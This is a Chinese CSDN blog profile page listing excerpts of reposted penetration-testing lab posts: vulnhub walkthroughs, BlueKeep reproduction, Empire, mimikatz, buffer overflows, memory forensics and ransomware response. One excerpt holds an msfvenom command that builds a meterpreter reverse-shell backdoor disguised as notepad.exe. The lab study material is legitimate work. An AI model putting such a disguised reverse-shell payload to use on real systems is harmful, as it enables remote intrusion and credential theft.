banacyo14206
码龄9年
求更新 关注
提问 私信
  • 博客:27,552
    27,552
    总访问量
  • 暂无
    原创
  • 5
    粉丝
  • 0
    关注
加入CSDN时间: 2016-01-17
博客简介:

banacyo14206的博客

查看详细资料
个人成就
  • 获得4次点赞
  • 内容获得0次评论
  • 获得24次收藏
  • 博客总排名2,262,895名
创作历程
  • 28篇
    2019年
成就勋章

TA关注的专栏 0

TA关注的收藏夹 0

TA关注的社区 0

TA参与的活动 0

创作活动更多

王者杯·14天创作挑战营·第2期

这是一个以写作博客为目的的创作活动,旨在鼓励码龄大于4年的博主们挖掘自己的创作潜能,展现自己的写作才华。如果你是一位热爱写作的、想要展现自己创作才华的小伙伴,那么,快来参加吧!我们一起发掘写作的魅力,书写出属于我们的故事。 注: 1、参赛者可以进入活动群进行交流、分享创作心得,互相鼓励与支持(开卷),答疑及活动群请见https://bbs.csdn.net/topics/619735097 2、文章质量分查询:https://www.csdn.net/qc 我们诚挚邀请你们参加为期14天的创作挑战赛!

81人参与 去参加
  • 最近
  • 文章
  • 专栏
  • 代码仓
  • 资源
  • 收藏
  • 关注/订阅/互动
更多
  • 最近

  • 文章

  • 专栏

  • 代码仓

  • 资源

  • 收藏

  • 关注/订阅/互动

  • 社区

  • 帖子

  • 问答

  • 课程

  • 视频

搜索 取消

Moonraker 靶机渗透

0x01 简介攻击Moonraker系统并且找出存在最大的威胁漏洞,通过最大威胁漏洞攻击目标靶机系统并进行提权获取系统中root目录下的flag信息。Moonraker: 1镜像下载地址:http://drive.google.com/open?id=13b2ewq5yqre2UbkLxZ58uHtLfk-SHvmA0x02 信息搜集1.获取目标ip地址,使...
转载
发布博客 2019.09.25 ·
788 阅读 ·
0 点赞 ·
0 评论 ·
2 收藏

Empire – PowerShell 后渗透攻击框架

0x01 简介Empire是一个后渗透攻击框架。它是一个纯粹的PowerShell代理,具有加密安全通信和灵活架构的附加功能。Empire具有在不需要PowerShell.exe的情况下执行PowerShell代理的方法。它可以迅速采用可后期利用的模块,涵盖范围广泛,从键盘记录器到mimikatz等。这个框架是PowerShell Empire和Python Empire项目的组合;...
转载
发布博客 2019.09.12 ·
731 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

cve_2019_0708_bluekeep复现采坑

0X01 简介Microsoft Windows是美国微软公司发布的视窗操作系统。远程桌面连接是微软从Windows 2000 Server开始提供的功能组件。2019年5月14日,微软发布了月度安全更新补丁,修复了远程桌面协议(RDP)远程代码执行漏洞。未经身份验证的攻击者利用该漏洞,向目标 Windows主机发送恶意构造请求,可以在目标系统上执行任意代码。近日,Metaspl...
转载
发布博客 2019.09.09 ·
1575 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

FourAndSix2 靶机渗透

0x01 简介FourAndSix2是易受攻击的一个靶机,主要任务是通过入侵进入到目标靶机系统然后提权,并在root目录中并读取flag.tx信息FourAndSix2.镜像下载地址:https://download.vulnhub.com/fourandsix/FourAndSix2.ova0x02 信息收集1.通过存活主机发现,确定目标机器IP2.端...
转载
发布博客 2019.09.24 ·
438 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

域渗透-LSA Protection

简介:微软在 2014 年 3 月 12 日添加了 LSA 保护策略,用来防止对进程 lsass.exe 的代码注入,这样一来就无法使用 mimikatz 对 lsass.exe 进行注入,相关操作也会失败。微软官方文档:https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server...
转载
发布博客 2019.08.31 ·
577 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

Cobalt_Strike扩展插件

Cobalt_Strike3.14下载:https://download.csdn.net/download/weixin_41082546/11604021https://github.com/harleyQu1nn/AggressorScriptshttps://github.com/bluscreenofjeff/AggressorScriptshttps://git...
转载
发布博客 2019.08.30 ·
2050 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

Mimikatz on meterpreter

实验环境:kali 主机:192.168.88.193目标靶机:win2008 R2 192.168.88.130kali 主机上执行生成一个后门 exe:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.193 LPORT=443 -f exe -o notepad.exemsfconsol...
转载
发布博客 2019.08.31 ·
283 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

vulnhub-XXE靶机渗透

靶机:下载链接:https://download.vulnhub.com/xxe/XXE.zipXXE注入工具下载:https://download.csdn.net/download/weixin_41082546/11609927CTFCrackTools解码工具:https://download.csdn.net/download/weixin_410825...
转载
发布博客 2019.08.24 ·
436 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

win server 2008搭建域环境

0x00 简介1.域控:win server 20082.域内服务器:win server 2008、win server 20033.域内PC:win7 x64、win7 x32、win xp0x01.配置静态IP查看IP地址和网关DNS为127.0.0.1,域控安装过程中会默认安装DNS服务。0x02.安装活动目录角色win+R打开运行,...
转载
发布博客 2019.08.25 ·
307 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

记一次找回win7密码

虚拟机密码忘了。修改启动顺序为CD,设置虚拟机光盘镜像为kali ISO(这里用的是kali 2017.2)。开启按f2进入kali live 模式fdisk -l 查看磁盘分区,找到win7虚拟机所使用的磁盘。mount /dev/sda1 /mnt 挂载完磁盘后需要退出/mnt 目录,重新进入才可以查看挂载的内容,这个在centos上也是这样的。...
转载
发布博客 2019.08.25 ·
244 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

勒索病毒应急处置流程

勒索病毒应急处置流程1.事件状态判断了解现状,了解发病时间,了解系统架构确认被感染主机范围2.临时处置已感染主机:进行网络隔离,禁止使用U盘、移动银盘等移动存储设备未感染主机:ACL隔离、关闭ssh、rdp等协议,禁止使用U盘、移动硬盘。3.信息收集分析样本获取windows:文件排查:msconfig查看启动项%UserProfile%\...
转载
发布博客 2019.08.22 ·
646 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

缓冲区溢出实例(二)--Linux

原理:crossfire 1.9.0 版本接受入站 socket 连接时存在缓冲区溢出漏洞。工具:调试工具:edb;###python在漏洞溢出方面的渗透测试和漏洞攻击中,具有很大的优势实验对象:crossfire【多人在线RPG游戏】运行平台:Kali i386 虚拟机【32位,计算机CPU位数是指地址总线位数,64位系统的寻址空间为2^64,寻址过大,难以处...
转载
发布博客 2019.08.22 ·
507 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

Raven 2 靶机渗透

0X00 前言Raven 2中一共有四个flag,Raven 2是一个中级boot2root VM。有四个标志要捕获。在多次破坏之后,Raven Security采取了额外措施来强化他们的网络服务器,以防止黑客进入。靶机下载地址:https://download.vulnhub.com/raven/Raven2.ova提权辅助工具LinEnum下载:https://do...
转载
发布博客 2019.08.24 ·
1012 阅读 ·
1 点赞 ·
0 评论 ·
0 收藏

电子取证-活取证1

电子取证使用dumpit工具将计算机内存镜像保存。并生成raw文件格式文件。检测镜像文件基本信息volatility -f 2008.raw imageinfo检测进程列表及物理内存位置volatility -f 2008.raw --profile=Win2008R2SP1x64 pslist产看进程树,可以轻松了解各进程之间的关系:...
转载
发布博客 2019.08.22 ·
346 阅读 ·
0 点赞 ·
0 评论 ·
3 收藏

缓冲区溢出实例(一)--Windows

一、基本概念缓冲区溢出:当缓冲区边界限制不严格时,由于变量传入畸形数据或程序运行错误,导致缓冲区被填满从而覆盖了相邻内存区域的数据。可以修改内存数据,造成进程劫持,执行恶意代码,获取服务器控制权限等。在Windows XP或2k3 server中的SLMail 5.5.0 Mail Server程序的POP3 PASS命令存在缓冲区溢出漏洞,无需身份验证实现远程代码执行。...
转载
发布博客 2019.08.22 ·
2410 阅读 ·
0 点赞 ·
0 评论 ·
3 收藏

靶机-SickOs 1.2 Walkthrough

SickOs:1.2https://www.vulnhub.com/entry/sickos-12,144/参考:https://www.cnblogs.com/yuzly/p/10854392.html提权辅助工具LinEnum下载:https://download.csdn.net/download/weixin_41082546/11609409提权辅助工具linu...
转载
发布博客 2019.08.22 ·
345 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

电子取证-活取证2

启动一个文本文件tasklist查看进程列表可以看到notepad.exe正在后台运行procdump -ma notepad.exe notepad.dmp-m memory-a all意思就是将和notepad.exe程序有关的所有内存dump下来保存为.dmp文件当前目录下生成一个notepad.dmp文件将dump文件中的字符...
转载
发布博客 2019.08.22 ·
417 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

靶机-droopyCTF Walkthrough

droopyCTFhttps://www.vulnhub.com/?q=droopy&sort=date-des&type=vmCTF镜像合集:https://www.vulnhub.com/?page=18参考:https://www.hackingarticles.in/hack-droopy-vm-ctf-challenge/提权辅助工具LinE...
转载
发布博客 2019.08.22 ·
257 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

靶机-BTRSys 2.1 Walkthrough

BTRSys 2.1https://www.vulnhub.com/entry/btrsys-v21,196/参考:https://www.jianshu.com/p/9813095ce04d提权辅助工具LinEnum下载:https://download.csdn.net/download/weixin_41082546/11609409提权辅助工具linuxprivc...
转载
发布博客 2019.08.22 ·
744 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

DC6-靶机渗透

靶场下载链接:Download: http://www.five86.com/downloads/DC-6.zip Download (Mirror): https://download.vulnhub.com/dc/DC-6.zip Download (Torrent): https://download.vulnhub.com/dc/DC-6.zip.torrent ( ...
转载
发布博客 2019.08.22 ·
605 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏
加载更多